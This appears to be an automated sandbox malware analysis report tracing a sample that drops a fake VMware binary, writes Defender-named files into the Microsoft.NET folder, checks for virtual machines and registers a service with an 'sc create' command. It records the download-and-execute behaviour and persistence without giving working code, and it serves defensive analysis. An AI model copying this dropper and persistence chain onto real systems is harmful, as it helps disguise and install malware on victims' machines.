Source:	Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb source: Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe, 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe, 00000004.00000000.2041997079.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe, 00000008.00000000.2055780401.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe, 00000008.00000002.3262746812.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe.3.dr
Source:	Binary string: MpSvc.pdb source: MpSvc.dll.8.dr
Source:	Binary string: MsMpCom.pdbGCTL source: MsMpCom.dll.8.dr

Source: 0923840932020004-3-0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 0923840932020004-3-0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 0923840932020004-3-0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 0923840932020004-3-0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 0923840932020004-3-0.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: shellext.dll.8.dr

Static PE information: 0xBC5C6CFA [Fri Feb 21 02:03:38 2070 UTC]

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe

Code function: 0_2_00F97326 SetDefaultDllDirectories,LoadLibraryW,GetProcAddress,CoInitialize,InitCommonControlsEx,GetModuleHandleW,GetModuleFileNameW,

0_2_00F97326

Source: ProtectionManagement.dll.8.dr	Static PE information: section name: .didat
Source: MpCmdRun.exe.8.dr	Static PE information: section name: .didat
Source: MpCmdRun.exe0.8.dr	Static PE information: section name: .didat
Source: MpCommu.dll.8.dr	Static PE information: section name: .didat
Source: MpClient.dll.8.dr	Static PE information: section name: _RDATA
Source: MpCmdRun.dll.8.dr	Static PE information: section name: .didata
Source: MpRtp.dll.8.dr	Static PE information: section name: .didat
Source: MpSvc.dll.8.dr	Static PE information: section name: .didat
Source: NisSrv.exe.8.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00F9B056 push ecx; ret	0_2_00F9B069
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00FAD603 push ecx; ret	0_2_00FAD616
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Code function: 3_2_00007FF848DFD2A5 pushad ; iretd	3_2_00007FF848DFD2A6
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Code function: 3_2_00007FF848F100BD pushad ; iretd	3_2_00007FF848F100C1
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0F0120 push ecx; ret	4_2_6E0F0133
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E3BF601 push ecx; ret	4_2_6E3BF614
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E3BF800 push eax; ret	4_2_6E3BF81E
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 8_2_0540CFF0 pushad ; iretd	8_2_0540CFF1

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

Code function: 4_2_6E0C5840 URLDownloadToFileW,Sleep,Sleep,Sleep,ShellExecuteW,Sleep,ShellExecuteW,

4_2_6E0C5840

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File created: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmwarebase.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpRtp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\en-US\OfflineScannerShell.exe.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\pt-BR\MsMpRes.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\EppManifest.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\en-US\shellext.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpAsDesc.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\pt-BR\shellext.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpDetours.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpSvc.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File created: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MsMpLics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File created: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MsMpEng.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\pt-BR\OfflineScannerShell.exe.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\shellext.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll	Jump to dropped file
Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	File created: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\pt-BR\EppManifest.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File created: C:\Users\user\AppData\Local\DefMeta\Update.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\endpointdlp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\en-US\MpAsDesc.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MsMpRes.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\en-US\MpEvMsg.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpOAV.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\en-US\MsMpRes.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpEvMsg.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpProvider.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpCommu.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MsMpCom.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\MpClient.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File created: C:\Program Files (x86)\Microsoft.NET\NisSrv.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

File created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.log

Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc			Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnk			Jump to behavior

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

4_2_00485C70

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\\Program Files (x86)\\Microsoft.NET\\MpCmdRun.exe" start= auto

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

Code function: 4_2_6E0EF01C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_6E0EF01C

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Registry key monitored for changes: HKEY_CURRENT_USER_Classes	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contain functionality to detect virtual machines

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: VMware Workstation VMware	4_2_00482450
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: vmware-vmx-stats.exe VMware	4_2_00482480
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: vmware-vmx-stats.exe vmware-vmx-stats.exe	4_2_004820B0
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: VMware Server Console VMware Server Console	4_2_00483360
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: vmware-vmx.exe vmware-vmx.exe	4_2_00484D00
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: VMware VMware VMware	4_2_00482DF0
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: VMware Authorization Service VMware Authorization Service	4_2_00483F80
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: vmware-vmx.exe vmware-vmx.exe vmware-vmx-debug.exe vmware-vmx-stats.exe vmware-vmx-debug.exe vmware-vmx-debug.exe	4_2_00481FB0
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	4_2_6E10281D

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Memory allocated: 1450000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Memory allocated: 1AFB0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File opened / queried: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmwarebase.DLL	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File opened / queried: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VMware, Inc\VMware Workstation.lnk	Jump to behavior
Source: C:\Windows\System32\conhost.exe	File opened / queried: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	File opened / queried: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe:Zone.Identifier	Jump to behavior
Source: C:\Windows\System32\conhost.exe	File opened / queried: C:\Users\user\AppData\Local\DefMeta\SystemResources\vmware-authd.exe.mun	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File opened / queried: C:\Users\user\AppData\Local\DefMeta\vmware-authd.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File opened / queried: C:\Users\user\Desktop\VMware Workstation.lnk	Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Window / User API: threadDelayed 2060			Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Window / User API: threadDelayed 714			Jump to behavior

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\EppManifest.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpRtp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\OfflineScannerShell.exe.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MsMpRes.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\EppManifest.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\endpointdlp.dll	Jump to dropped file
